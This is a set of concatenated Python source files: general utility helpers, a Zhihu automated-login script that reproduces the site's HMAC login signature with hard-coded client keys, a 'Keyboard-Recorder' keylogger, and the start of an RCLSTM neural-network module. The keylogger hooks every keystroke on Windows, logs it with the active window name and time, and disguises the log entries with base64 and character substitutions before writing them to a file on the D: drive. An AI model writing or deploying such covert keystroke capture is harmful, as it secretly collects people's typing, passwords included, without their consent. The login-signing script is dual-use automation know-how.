return 'OrderedSet([%s])' % (', '.join(map(repr, self.keys())))
def __str__(self):
return '{%s}' % (', '.join(map(repr, self.keys())))
difference = property(lambda self: self.__sub__)
difference_update = property(lambda self: self.__isub__)
intersection = property(lambda self: self.__and__)
intersection_update = property(lambda self: self.__iand__)
issubset = property(lambda self: self.__le__)
issuperset = property(lambda self: self.__ge__)
symmetric_difference = property(lambda self: self.__xor__)
symmetric_difference_update = property(lambda self: self.__ixor__)
union = property(lambda self: self.__or__)
def get_md5(url):
    # In Python 3, str is already unicode (the counterpart of Python 2's unicode type)
if isinstance(url, str):
url = url.encode("utf-8")
m = hashlib.md5()
m.update(url)
return m.hexdigest()
def extract_num(text):
    # Extract the first integer found in a string
    match_re = re.match(r".*?(\d+).*", text)
if match_re:
nums = int(match_re.group(1))
else:
nums = 0
return nums
def extract_num_include_dot(text):
    # Extract an integer from a string that may contain thousands separators (commas)
    text_num = text.replace(',', '')
    try:
        nums = int(text_num)
    except (ValueError, TypeError):
        nums = -1
return nums
if __name__ == "__main__":
print(get_md5("http://jobbole.com".encode("utf-8")))
```
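A quick usage sketch for the helpers above (not part of the original module; it assumes the functions are in scope):
```python
# Illustrative usage of the helpers defined above.
s = OrderedSet()
s.update(['a', 'b', 'a', 'c'])            # duplicates collapse, insertion order is kept
print(s)                                  # {'a', 'b', 'c'}
print(get_md5('http://jobbole.com'))      # stable 32-char hex digest of the URL
print(extract_num('12 条评论'))           # 12
print(extract_num_include_dot('1,024'))   # 1024
```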
#### File: ArticleSpider/utils/login_zhihu.py
```python
__author__ = 'mtianyan'
__date__ = '2018/1/18 0018 23:48'
import requests
from parsel import Selector
import json
import time
from copyheaders import headers_raw_to_dict
import execjs
from requests_toolbelt.multipart.encoder import MultipartEncoder
# Save cookies locally after logging in
try:
import cookielib
except BaseException:
import http.cookiejar as cookielib
s = requests.session()
s.cookies = cookielib.LWPCookieJar(filename="cookies.txt")
try:
s.cookies.load(ignore_discard=True)
except BaseException:
print ("cookie未能加载")
# User-Agent header
s.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'
}
# Key header: authorization
post_headers_raw = b'''
accept:application/json, text/plain, */*
Accept-Encoding:gzip, deflate, br
Accept-Language:zh-CN,zh;q=0.9,zh-TW;q=0.8
authorization:oauth c3cef7c66a1843f8b3a9e6a1e3160e20
Connection:keep-alive
DNT:1
Host:www.zhihu.com
Origin:https://www.zhihu.com
Referer:https://www.zhihu.com/signup?next=%2F
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
'''
def is_login():
    # Judge login state from the status code returned for a page that requires login
inbox_url = "https://www.zhihu.com/question/56250357/answer/148534773"
response = s.get(inbox_url, headers=getheaders(), allow_redirects=False)
if response.status_code != 200:
return False
else:
return True
# Build the complete headers: both the UDID and the xsrf token are required
def getheaders():
    # Parse the UDID and Xsrftoken out of the homepage source
z1 = s.get('https://www.zhihu.com/')
sel = Selector(z1.text)
jsdata = sel.css('div#data::attr(data-state)').extract_first()
xudid = json.loads(jsdata)['token']['xUDID']
print(xudid)
xsrf = json.loads(jsdata)['token']['xsrf']
print(xsrf)
headers = headers_raw_to_dict(post_headers_raw)
headers['X-UDID'] = xudid
headers['X-Xsrftoken'] = xsrf
return headers
# Build the login payload
def getdata(username, password, captcha=''):
client_id = 'c3cef7c66a1843f8b3a9e6a1e3160e20'
timestamp = int(time.time()) * 1000
t = str(int(time.time() * 1000))
js1 = execjs.compile("""
function a(e, t, n) {
var r, o, a, i, c, s, u, l, y, b = 0,
g = [],
w = 0,
E = !1,
_ = [],
O = [],
C = !1,
T = !1;
if (n = n || {}, r = n.encoding || "UTF8", y = n.numRounds || 1, a = v(t, r), y !== parseInt(y, 10) || 1 > y) throw Error("numRounds must a integer >= 1");
if ("SHA-1" === e) c = 512, s = q, u = H, i = 160, l = function (e) {
return e.slice()
};
else if (0 === e.lastIndexOf("SHA-", 0))
if (s = function (t, n) {
return V(t, n, e)
}, u = function (t, n, r, o) {
var a, i;
if ("SHA-224" === e || "SHA-256" === e) a = 15 + (n + 65 >>> 9 << 4), i = 16;
else {
if ("SHA-384" !== e && "SHA-512" !== e) throw Error("Unexpected error in SHA-2 implementation");
a = 31 + (n + 129 >>> 10 << 5), i = 32
}
for (; t.length <= a;) t.push(0);
for (t[n >>> 5] |= 128 << 24 - n % 32, n += r, t[a] = 4294967295 & n, t[a - 1] = n / 4294967296 | 0, r = t.length, n = 0; n < r; n += i) o = V(t.slice(n, n + i), o, e);
if ("SHA-224" === e) t = [o[0], o[1], o[2], o[3], o[4], o[5], o[6]];
else if ("SHA-256" === e) t = o;
else if ("SHA-384" === e) t = [o[0].a, o[0].b, o[1].a, o[1].b, o[2].a, o[2].b, o[3].a, o[3].b, o[4].a, o[4].b, o[5].a, o[5].b];
else {
if ("SHA-512" !== e) throw Error("Unexpected error in SHA-2 implementation");
t = [o[0].a, o[0].b, o[1].a, o[1].b, o[2].a, o[2].b, o[3].a, o[3].b, o[4].a, o[4].b, o[5].a, o[5].b, o[6].a, o[6].b, o[7].a, o[7].b]
}
return t
}, l = function (e) {
return e.slice()
}, "SHA-224" === e) c = 512, i = 224;
else if ("SHA-256" === e) c = 512, i = 256;
else if ("SHA-384" === e) c = 1024, i = 384;
else {
if ("SHA-512" !== e) throw Error("Chosen SHA variant is not supported");
c = 1024, i = 512
} else {
if (0 !== e.lastIndexOf("SHA3-", 0) && 0 !== e.lastIndexOf("SHAKE", 0)) throw Error("Chosen SHA variant is not supported");
var S = 6;
if (s = G, l = function (e) {
var t, n = [];
for (t = 0; 5 > t; t += 1) n[t] = e[t].slice();
return n
}, "SHA3-224" === e) c = 1152, i = 224;
else if ("SHA3-256" === e) c = 1088, i = 256;
else if ("SHA3-384" === e) c = 832, i = 384;
else if ("SHA3-512" === e) c = 576, i = 512;
else if ("SHAKE128" === e) c = 1344, i = -1, S = 31, T = !0;
else {
if ("SHAKE256" !== e) throw Error("Chosen SHA variant is not supported");
c = 1088, i = -1, S = 31, T = !0
}
u = function (e, t, n, r, o) {
n = c;
var a, i = S,
s = [],
u = n >>> 5,
l = 0,
f = t >>> 5;
for (a = 0; a < f && t >= n; a += u) r = G(e.slice(a, a + u), r), t -= n;
for (e = e.slice(a), t %= n; e.length < u;) e.push(0);
for (a = t >>> 3, e[a >> 2] ^= i << 24 - a % 4 * 8, e[u - 1] ^= 128, r = G(e, r); 32 * s.length < o && (e = r[l % 5][l / 5 | 0], s.push((255 & e.b) << 24 | (65280 & e.b) << 8 | (16711680 & e.b) >> 8 | e.b >>> 24), !(32 * s.length >= o));) s.push((255 & e.a) << 24 | (65280 & e.a) << 8 | (16711680 & e.a) >> 8 | e.a >>> 24), 0 == 64 * (l += 1) % n && G(null, r);
return s
}
}
o = F(e), this.setHMACKey = function (t, n, a) {
var l;
if (!0 === E) throw Error("HMAC key already set");
if (!0 === C) throw Error("Cannot set HMAC key after calling update");
if (!0 === T) throw Error("SHAKE is not supported for HMAC");
if (r = (a || {}).encoding || "UTF8", n = v(n, r)(t), t = n.binLen, n = n.value, l = c >>> 3, a = l / 4 - 1, l < t / 8) {
for (n = u(n, t, 0, F(e), i); n.length <= a;) n.push(0);
n[a] &= 4294967040
} else if (l > t / 8) {
for (; n.length <= a;) n.push(0);
n[a] &= 4294967040
}
for (t = 0; t <= a; t += 1) _[t] = 909522486 ^ n[t], O[t] = 1549556828 ^ n[t];
o = s(_, o), b = c, E = !0
}, this.update = function (e) {
var t, n, r, i = 0,
u = c >>> 5;
for (t = a(e, g, w), e = t.binLen, n = t.value, t = e >>> 5, r = 0; r < t; r += u) i + c <= e && (o = s(n.slice(r, r + u), o), i += c);
b += i, g = n.slice(i >>> 5), w = e % c, C = !0
}, this.getHash = function (t, n) {
var r, a, c, s;
if (!0 === E) throw Error("Cannot call getHash after setting HMAC key");
if (c = m(n), !0 === T) {
if (-1 === c.shakeLen) throw Error("shakeLen must be specified in options");
i = c.shakeLen
}
switch (t) {
case "HEX":
r = function (e) {
return f(e, i, c)
};
break;
case "B64":
r = function (e) {
return p(e, i, c)
};
break;
case "BYTES":
r = function (e) {
return d(e, i)
};
break;
case "ARRAYBUFFER":
try {
a = new ArrayBuffer(0)
} catch (e) {
throw Error("ARRAYBUFFER not supported by this environment")
}
r = function (e) {
return h(e, i)
};
break;
default:
throw Error("format must be HEX, B64, BYTES, or ARRAYBUFFER")
}
for (s = u(g.slice(), w, b, l(o), i), a = 1; a < y; a += 1) !0 === T && 0 != i % 32 && (s[s.length - 1] &= 4294967040 << 24 - i % 32), s = u(s, i, 0, F(e), i);
return r(s)
}, this.getHMAC = function (t, n) {
var r, a, v, y;
if (!1 === E) throw Error("Cannot call getHMAC without first setting HMAC key");
switch (v = m(n), t) {
case "HEX":
r = function (e) {
return f(e, i, v)
};
break;
case "B64":
r = function (e) {
return p(e, i, v)
};
break;
case "BYTES":
r = function (e) {
return d(e, i)
};
break;
case "ARRAYBUFFER":
try {
r = new ArrayBuffer(0)
} catch (e) {
throw Error("ARRAYBUFFER not supported by this environment")
}
r = function (e) {
return h(e, i)
};
break;
default:
throw Error("outputFormat must be HEX, B64, BYTES, or ARRAYBUFFER")
}
return a = u(g.slice(), w, b, l(o), i), y = s(O, F(e)), y = u(a, i, c, y, i), r(y)
}
}
function i(e, t) {
this.a = e, this.b = t
}
function c(e, t, n) {
var r, o, a, i, c, s = e.length;
if (t = t || [0], n = n || 0, c = n >>> 3, 0 != s % 2) throw Error("String of HEX type must be in byte increments");
for (r = 0; r < s; r += 2) {
if (o = parseInt(e.substr(r, 2), 16), isNaN(o)) throw Error("String of HEX type contains invalid characters");
for (i = (r >>> 1) + c, a = i >>> 2; t.length <= a;) t.push(0);
t[a] |= o << 8 * (3 - i % 4)
}
return {
value: t,
binLen: 4 * s + n
}
}
function s(e, t, n) {
var r, o, a, i, c = [],
c = t || [0];
for (n = n || 0, o = n >>> 3, r = 0; r < e.length; r += 1) t = e.charCodeAt(r), i = r + o, a = i >>> 2, c.length <= a && c.push(0), c[a] |= t << 8 * (3 - i % 4);
return {
value: c,
binLen: 8 * e.length + n
}
}
function u(e, t, n) {
var r, o, a, i, c, s, u = [],
l = 0,
u = t || [0];
if (n = n || 0, t = n >>> 3, -1 === e.search(/^[a-zA-Z0-9=+\/]+$/)) throw Error("Invalid character in base-64 string");
if (o = e.indexOf("="), e = e.replace(/\=/g, ""), -1 !== o && o < e.length) throw Error("Invalid '=' found in base-64 string");
for (o = 0; o < e.length; o += 4) {
for (c = e.substr(o, 4), a = i = 0; a < c.length; a += 1) r = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".indexOf(c[a]), i |= r << 18 - 6 * a;
for (a = 0; a < c.length - 1; a += 1) {
for (s = l + t, r = s >>> 2; u.length <= r;) u.push(0);
u[r] |= (i >>> 16 - 8 * a & 255) << 8 * (3 - s % 4), l += 1
}
}
return {
value: u,
binLen: 8 * l + n
}
}
function l(e, t, n) {
var r, o, a, i = [],
i = t || [0];
for (n = n || 0, r = n >>> 3, t = 0; t < e.byteLength; t += 1) a = t + r, o = a >>> 2, i.length <= o && i.push(0), i[o] |= e[t] << 8 * (3 - a % 4);
return {
value: i,
binLen: 8 * e.byteLength + n
}
}
function f(e, t, n) {
var r = "";
t /= 8;
var o, a;
for (o = 0; o < t; o += 1) a = e[o >>> 2] >>> 8 * (3 - o % 4), r += "0123456789abcdef".charAt(a >>> 4 & 15) + "0123456789abcdef".charAt(15 & a);
return n.outputUpper ? r.toUpperCase() : r
}
function p(e, t, n) {
var r, o, a, i = "",
c = t / 8;
for (r = 0; r < c; r += 3)
for (o = r + 1 < c ? e[r + 1 >>> 2] : 0, a = r + 2 < c ? e[r + 2 >>> 2] : 0, a = (e[r >>> 2] >>> 8 * (3 - r % 4) & 255) << 16 | (o >>> 8 * (3 - (r + 1) % 4) & 255) << 8 | a >>> 8 * (3 - (r + 2) % 4) & 255, o = 0; 4 > o; o += 1) i += 8 * r + 6 * o <= t ? "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(a >>> 6 * (3 - o) & 63) : n.b64Pad;
return i
}
function d(e, t) {
var n, r, o = "",
a = t / 8;
for (n = 0; n < a; n += 1) r = e[n >>> 2] >>> 8 * (3 - n % 4) & 255, o += String.fromCharCode(r);
return o
}
function h(e, t) {
var n, r = t / 8,
o = new ArrayBuffer(r);
for (n = 0; n < r; n += 1) o[n] = e[n >>> 2] >>> 8 * (3 - n % 4) & 255;
return o
}
function m(e) {
var t = {
outputUpper: !1,
b64Pad: "=",
shakeLen: -1
};
if (e = e || {}, t.outputUpper = e.outputUpper || !1, !0 === e.hasOwnProperty("b64Pad") && (t.b64Pad = e.b64Pad), !0 === e.hasOwnProperty("shakeLen")) {
if (0 != e.shakeLen % 8) throw Error("shakeLen must be a multiple of 8");
t.shakeLen = e.shakeLen
}
if ("boolean" != typeof t.outputUpper) throw Error("Invalid outputUpper formatting option");
if ("string" != typeof t.b64Pad) throw Error("Invalid b64Pad formatting option");
return t
}
function v(e, t) {
var n;
switch (t) {
case "UTF8":
case "UTF16BE":
case "UTF16LE":
break;
default:
throw Error("encoding must be UTF8, UTF16BE, or UTF16LE")
}
switch (e) {
case "HEX":
n = c;
break;
case "TEXT":
n = function (e, n, r) {
var o, a, i, c, s, u = [],
l = [],
f = 0,
u = n || [0];
if (n = r || 0, i = n >>> 3, "UTF8" === t)
for (o = 0; o < e.length; o += 1)
for (r = e.charCodeAt(o), l = [], 128 > r ? l.push(r) : 2048 > r ? (l.push(192 | r >>> 6), l.push(128 | 63 & r)) : 55296 > r || 57344 <= r ? l.push(224 | r >>> 12, 128 | r >>> 6 & 63, 128 | 63 & r) : (o += 1, r = 65536 + ((1023 & r) << 10 | 1023 & e.charCodeAt(o)), l.push(240 | r >>> 18, 128 | r >>> 12 & 63, 128 | r >>> 6 & 63, 128 | 63 & r)), a = 0; a < l.length; a += 1) {
for (s = f + i, c = s >>> 2; u.length <= c;) u.push(0);
u[c] |= l[a] << 8 * (3 - s % 4), f += 1
} else if ("UTF16BE" === t || "UTF16LE" === t)
for (o = 0; o < e.length; o += 1) {
for (r = e.charCodeAt(o), "UTF16LE" === t && (a = 255 & r, r = a << 8 | r >>> 8), s = f + i, c = s >>> 2; u.length <= c;) u.push(0);
u[c] |= r << 8 * (2 - s % 4), f += 2
}
return {
value: u,
binLen: 8 * f + n
}
};
break;
case "B64":
n = u;
break;
case "BYTES":
n = s;
break;
case "ARRAYBUFFER":
try {
n = new ArrayBuffer(0)
} catch (e) {
throw Error("ARRAYBUFFER not supported by this environment")
}
n = l;
break;
default:
throw Error("format must be HEX, TEXT, B64, BYTES, or ARRAYBUFFER")
}
return n
}
function y(e, t) {
return e << t | e >>> 32 - t
}
function b(e, t) {
return 32 < t ? (t -= 32, new i(e.b << t | e.a >>> 32 - t, e.a << t | e.b >>> 32 - t)) : 0 !== t ? new i(e.a << t | e.b >>> 32 - t, e.b << t | e.a >>> 32 - t) : e
}
function g(e, t) {
return e >>> t | e << 32 - t
}
function w(e, t) {
var n = null,
n = new i(e.a, e.b);
return n = 32 >= t ? new i(n.a >>> t | n.b << 32 - t & 4294967295, n.b >>> t | n.a << 32 - t & 4294967295) : new i(n.b >>> t - 32 | n.a << 64 - t & 4294967295, n.a >>> t - 32 | n.b << 64 - t & 4294967295)
}
function E(e, t) {
return 32 >= t ? new i(e.a >>> t, e.b >>> t | e.a << 32 - t & 4294967295) : new i(0, e.a >>> t - 32)
}
function _(e, t, n) {
return e & t ^ ~e & n
}
function O(e, t, n) {
return new i(e.a & t.a ^ ~e.a & n.a, e.b & t.b ^ ~e.b & n.b)
}
function C(e, t, n) {
return e & t ^ e & n ^ t & n
}
function T(e, t, n) {
return new i(e.a & t.a ^ e.a & n.a ^ t.a & n.a, e.b & t.b ^ e.b & n.b ^ t.b & n.b)
}
function S(e) {
return g(e, 2) ^ g(e, 13) ^ g(e, 22)
}
function k(e) {
var t = w(e, 28),
n = w(e, 34);
return e = w(e, 39), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function j(e) {
return g(e, 6) ^ g(e, 11) ^ g(e, 25)
}
function P(e) {
var t = w(e, 14),
n = w(e, 18);
return e = w(e, 41), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function A(e) {
return g(e, 7) ^ g(e, 18) ^ e >>> 3
}
function x(e) {
var t = w(e, 1),
n = w(e, 8);
return e = E(e, 7), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function I(e) {
return g(e, 17) ^ g(e, 19) ^ e >>> 10
}
function N(e) {
var t = w(e, 19),
n = w(e, 61);
return e = E(e, 6), new i(t.a ^ n.a ^ e.a, t.b ^ n.b ^ e.b)
}
function R(e, t) {
var n = (65535 & e) + (65535 & t);
return ((e >>> 16) + (t >>> 16) + (n >>> 16) & 65535) << 16 | 65535 & n
}
function M(e, t, n, r) {
var o = (65535 & e) + (65535 & t) + (65535 & n) + (65535 & r);
return ((e >>> 16) + (t >>> 16) + (n >>> 16) + (r >>> 16) + (o >>> 16) & 65535) << 16 | 65535 & o
}
function D(e, t, n, r, o) {
var a = (65535 & e) + (65535 & t) + (65535 & n) + (65535 & r) + (65535 & o);
return ((e >>> 16) + (t >>> 16) + (n >>> 16) + (r >>> 16) + (o >>> 16) + (a >>> 16) & 65535) << 16 | 65535 & a
}
function L(e, t) {
var n, r, o;
return n = (65535 & e.b) + (65535 & t.b), r = (e.b >>> 16) + (t.b >>> 16) + (n >>> 16), o = (65535 & r) << 16 | 65535 & n, n = (65535 & e.a) + (65535 & t.a) + (r >>> 16), r = (e.a >>> 16) + (t.a >>> 16) + (n >>> 16), new i((65535 & r) << 16 | 65535 & n, o)
}
function z(e, t, n, r) {
var o, a, c;
return o = (65535 & e.b) + (65535 & t.b) + (65535 & n.b) + (65535 & r.b), a = (e.b >>> 16) + (t.b >>> 16) + (n.b >>> 16) + (r.b >>> 16) + (o >>> 16), c = (65535 & a) << 16 | 65535 & o, o = (65535 & e.a) + (65535 & t.a) + (65535 & n.a) + (65535 & r.a) + (a >>> 16), a = (e.a >>> 16) + (t.a >>> 16) + (n.a >>> 16) + (r.a >>> 16) + (o >>> 16), new i((65535 & a) << 16 | 65535 & o, c)
}
function U(e, t, n, r, o) {
var a, c, s;
return a = (65535 & e.b) + (65535 & t.b) + (65535 & n.b) + (65535 & r.b) + (65535 & o.b), c = (e.b >>> 16) + (t.b >>> 16) + (n.b >>> 16) + (r.b >>> 16) + (o.b >>> 16) + (a >>> 16), s = (65535 & c) << 16 | 65535 & a, a = (65535 & e.a) + (65535 & t.a) + (65535 & n.a) + (65535 & r.a) + (65535 & o.a) + (c >>> 16), c = (e.a >>> 16) + (t.a >>> 16) + (n.a >>> 16) + (r.a >>> 16) + (o.a >>> 16) + (a >>> 16), new i((65535 & c) << 16 | 65535 & a, s)
}
function B(e) {
var t, n = 0,
r = 0;
for (t = 0; t < arguments.length; t += 1) n ^= arguments[t].b, r ^= arguments[t].a;
return new i(r, n)
}
function F(e) {
var t, n = [];
if ("SHA-1" === e) n = [1732584193, 4023233417, 2562383102, 271733878, 3285377520];
else if (0 === e.lastIndexOf("SHA-", 0)) switch (n = [3238371032, 914150663, 812702999, 4144912697, 4290775857, 1750603025, 1694076839, 3204075428], t = [1779033703, 3144134277, 1013904242, 2773480762, 1359893119, 2600822924, 528734635, 1541459225], e) {
case "SHA-224":
break;
case "SHA-256":
n = t;
break;
case "SHA-384":
n = [new i(3418070365, n[0]), new i(1654270250, n[1]), new i(2438529370, n[2]), new i(355462360, n[3]), new i(1731405415, n[4]), new i(41048885895, n[5]), new i(3675008525, n[6]), new i(1203062813, n[7])];
break;
case "SHA-512":
n = [new i(t[0], 4089235720), new i(t[1], 2227873595), new i(t[2], 4271175723), new i(t[3], 1595750129), new i(t[4], 2917565137), new i(t[5], 725511199), new i(t[6], 4215389547), new i(t[7], 327033209)];
break;
default:
throw Error("Unknown SHA variant")
} else {
if (0 !== e.lastIndexOf("SHA3-", 0) && 0 !== e.lastIndexOf("SHAKE", 0)) throw Error("No SHA variants supported");
for (e = 0; 5 > e; e += 1) n[e] = [new i(0, 0), new i(0, 0), new i(0, 0), new i(0, 0), new i(0, 0)]
}
return n
}
function q(e, t) {
var n, r, o, a, i, c, s, u = [];
for (n = t[0], r = t[1], o = t[2], a = t[3], i = t[4], s = 0; 80 > s; s += 1) u[s] = 16 > s ? e[s] : y(u[s - 3] ^ u[s - 8] ^ u[s - 14] ^ u[s - 16], 1), c = 20 > s ? D(y(n, 5), r & o ^ ~r & a, i, 1518500249, u[s]) : 40 > s ? D(y(n, 5), r ^ o ^ a, i, 1859775393, u[s]) : 60 > s ? D(y(n, 5), C(r, o, a), i, 2400959708, u[s]) : D(y(n, 5), r ^ o ^ a, i, 3395469782, u[s]), i = a, a = o, o = y(r, 30), r = n, n = c;
return t[0] = R(n, t[0]), t[1] = R(r, t[1]), t[2] = R(o, t[2]), t[3] = R(a, t[3]), t[4] = R(i, t[4]), t
}
function H(e, t, n, r) {
var o;
for (o = 15 + (t + 65 >>> 9 << 4); e.length <= o;) e.push(0);
for (e[t >>> 5] |= 128 << 24 - t % 32, t += n, e[o] = 4294967295 & t, e[o - 1] = t / 4294967296 | 0, t = e.length, o = 0; o < t; o += 16) r = q(e.slice(o, o + 16), r);
return r
}
function V(e, t, n) {
var r, o, a, c, s, u, l, f, p, d, h, m, v, y, b, g, w, E, B, F, q, H, V, G = [];
if ("SHA-224" === n || "SHA-256" === n) d = 64, m = 1, H = Number, v = R, y = M, b = D, g = A, w = I, E = S, B = j, q = C, F = _, V = W;
else {
if ("SHA-384" !== n && "SHA-512" !== n) throw Error("Unexpected error in SHA-2 implementation");
d = 80, m = 2, H = i, v = L, y = z, b = U, g = x, w = N, E = k, B = P, q = T, F = O, V = K
}
for (n = t[0], r = t[1], o = t[2], a = t[3], c = t[4], s = t[5], u = t[6], l = t[7], h = 0; h < d; h += 1) 16 > h ? (p = h * m, f = e.length <= p ? 0 : e[p], p = e.length <= p + 1 ? 0 : e[p + 1], G[h] = new H(f, p)) : G[h] = y(w(G[h - 2]), G[h - 7], g(G[h - 15]), G[h - 16]), f = b(l, B(c), F(c, s, u), V[h], G[h]), p = v(E(n), q(n, r, o)), l = u, u = s, s = c, c = v(a, f), a = o, o = r, r = n, n = v(f, p);
return t[0] = v(n, t[0]), t[1] = v(r, t[1]), t[2] = v(o, t[2]), t[3] = v(a, t[3]), t[4] = v(c, t[4]), t[5] = v(s, t[5]), t[6] = v(u, t[6]), t[7] = v(l, t[7]), t
}
function G(e, t) {
var n, r, o, a, c = [],
s = [];
if (null !== e)
for (r = 0; r < e.length; r += 2) t[(r >>> 1) % 5][(r >>> 1) / 5 | 0] = B(t[(r >>> 1) % 5][(r >>> 1) / 5 | 0], new i((255 & e[r + 1]) << 24 | (65280 & e[r + 1]) << 8 | (16711680 & e[r + 1]) >>> 8 | e[r + 1] >>> 24, (255 & e[r]) << 24 | (65280 & e[r]) << 8 | (16711680 & e[r]) >>> 8 | e[r] >>> 24));
for (n = 0; 24 > n; n += 1) {
for (a = F("SHA3-"), r = 0; 5 > r; r += 1) c[r] = B(t[r][0], t[r][1], t[r][2], t[r][3], t[r][4]);
for (r = 0; 5 > r; r += 1) s[r] = B(c[(r + 4) % 5], b(c[(r + 1) % 5], 1));
for (r = 0; 5 > r; r += 1)
for (o = 0; 5 > o; o += 1) t[r][o] = B(t[r][o], s[r]);
for (r = 0; 5 > r; r += 1)
for (o = 0; 5 > o; o += 1) a[o][(2 * r + 3 * o) % 5] = b(t[r][o], Q[r][o]);
for (r = 0; 5 > r; r += 1)
for (o = 0; 5 > o; o += 1) t[r][o] = B(a[r][o], new i(~a[(r + 1) % 5][o].a & a[(r + 2) % 5][o].a, ~a[(r + 1) % 5][o].b & a[(r + 2) % 5][o].b));
t[0][0] = B(t[0][0], Y[n])
}
return t
}
function run(e,n){
// e = password,
        // n is the timestamp in milliseconds, e.g. 1515735045595
        // client_id currently defaults to c3cef7c66a1843f8b3a9e6a1e3160e20
client_id = 'c3cef7c66a1843f8b3a9e6a1e3160e20';
r = new a("SHA-1", "TEXT");
r.setHMACKey("d1b964811afb40118a12068ff74a12f4", "TEXT");
r.update(e);
r.update(client_id);
r.update("com.zhihu.web");
r.update(String(n));
return r.getHMAC("HEX")
}
""")
signature = js1.call('run', 'password', timestamp)
data = {
'client_id': client_id, 'grant_type': 'password',
'timestamp': str(timestamp), 'source': 'com.zhihu.web',
'signature': str(signature), 'username': username,
'password': password, 'captcha': captcha,
'lang': 'en', 'ref_source': 'homepage', 'utm_source': ''
}
return data
# Check whether a captcha is required
def checkcapthca(headers, cn=True):
    'Check whether a captcha is required; the request must be sent either way'
if cn:
url = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'
else:
url = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'
headers.pop('X-Xsrftoken')
z = s.get(url, headers=headers)
# print(z.json())
return z.json()
# Login function
def login(username, password):
    url = 'https://www.zhihu.com/api/v3/oauth/sign_in'
headers = getheaders()
data = getdata(username, password)
checkcapthca(headers)
    # multipart_encoder = MultipartEncoder(fields=data, boundary='----WebKitFormBoundarycGPN1xiTi2hCSKKZ')
    # TODO: the digits after the boundary could be randomized; they are fixed for now
encoder = MultipartEncoder(
data, boundary='-----------------------------41184676334')
headers['Content-Type'] = encoder.content_type
print(encoder)
print(headers)
z2 = s.post(url, headers=headers, data=encoder.to_string(), )
print(z2.json())
print('登录成功')
s.cookies.save()
if __name__ == '__main__':
username = '<EMAIL>'
password = '<PASSWORD>'
login(username, password)
``` |
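The large block of embedded JavaScript above exists only to compute an HMAC-SHA1 signature over the grant type, client_id, source and timestamp (see the `run` function at its end). A pure-Python sketch of the same calculation, which would avoid the `execjs` dependency, is shown below; the key and field values are copied from the code above, but whether Zhihu still accepts this signing scheme is not guaranteed:
```python
# Pure-Python equivalent of the embedded JS `run` function (sketch only).
import hmac
import hashlib
import time

def get_signature(timestamp,
                  client_id='c3cef7c66a1843f8b3a9e6a1e3160e20',
                  key=b'd1b964811afb40118a12068ff74a12f4'):
    h = hmac.new(key, digestmod=hashlib.sha1)
    h.update(b'password')                     # grant_type
    h.update(client_id.encode('utf-8'))
    h.update(b'com.zhihu.web')                # source
    h.update(str(timestamp).encode('utf-8'))
    return h.hexdigest()

# e.g. signature = get_signature(int(time.time()) * 1000)
```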
{
"source": "jinjie412/Keyboard-Recorder",
"score": 2
} |
#### File: Keyboard-Recorder/Beta Testing Version/py-hook V2.py
```python
__author__ = 'cyankw'
import pythoncom
import pyHook
import datetime
import urllib, base64
from multiprocessing import Pool
kll=[]
kll2=[]
oldname = ''
def onKeyboardEvent(event):
    # Handle a keyboard event
timeNow = datetime.datetime.now()
Now = timeNow.strftime('%H:%M:%S')
wrfile = open(r'd://install22.txt', 'a')
evtname = event.WindowName
global oldname
NAME = "WindowName:%s\n" % event.WindowName
TIME="Time:%s\n" % datetime.datetime.now()
KEY=" Key:%s-%s \n" % (event.Key, Now)
LINE="---------\n"
NAME=base64.encodestring(urllib.quote(NAME))
TIME=base64.encodestring(urllib.quote(TIME))
KEY=base64.encodestring(urllib.quote(KEY))
LINE=base64.encodestring(urllib.quote(LINE))
NAME = NAME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
KEY = KEY.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
TIME = TIME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
LINE = LINE.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
    if evtname != oldname:
wrfile.write(LINE)
wrfile.write(NAME)
wrfile.write(TIME)
oldname = event.WindowName
print LINE
print NAME
print TIME
    wrfile.write(KEY)
    print KEY
    wrfile.close()
    return True
def main():
    # Create a hook manager object
    hm = pyHook.HookManager()
    # Listen for all keyboard events
    hm.KeyDown = onKeyboardEvent
    # Install the keyboard hook
    hm.HookKeyboard()
    pythoncom.PumpMessages()
if __name__ == "__main__":
p = Pool(processes=8)
main()
p.close()
p.join()
``` |
{
"source": "jinjieyu/RCLSTM",
"score": 3
} |
#### File: RCLSTM/RCLSTM/rclstm.py
```python
import torch
from torch import nn
# from torch.autograd import Variable
from torch.nn import functional, init
import numpy as np
import random
import math
# generate mask matrix based on uniform distribution
def generate_mask_matrix(shape, connection=1.):
s = np.random.uniform(size=shape)
s_flat = s.flatten()
s_flat.sort()
threshold = s_flat[int(shape[0]*shape[1]*(1-connection))]
super_threshold_indices = s>=threshold
lower_threshold_indices = s<threshold
s[super_threshold_indices] = 1.
s[lower_threshold_indices] = 0.
return s
def generate_weight_mask(shape, connection=1.):
sub_shape = (shape[0], shape[1])
w = []
for _ in range(4):
w.append(generate_mask_matrix(sub_shape, connection))
return np.concatenate(w, axis=1).astype('float32')
class LSTMCell(nn.Module):
"""A basic LSTM cell."""
def __init__(self, input_size, hidden_size):
"""
Most parts are copied from torch.nn.LSTMCell.
"""
super(LSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.weight_ih = nn.Parameter(torch.FloatTensor(input_size, 4 * hidden_size))
self.weight_hh = nn.Parameter(torch.FloatTensor(hidden_size, 4 * hidden_size))
self.bias = nn.Parameter(torch.FloatTensor(4 * hidden_size))
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
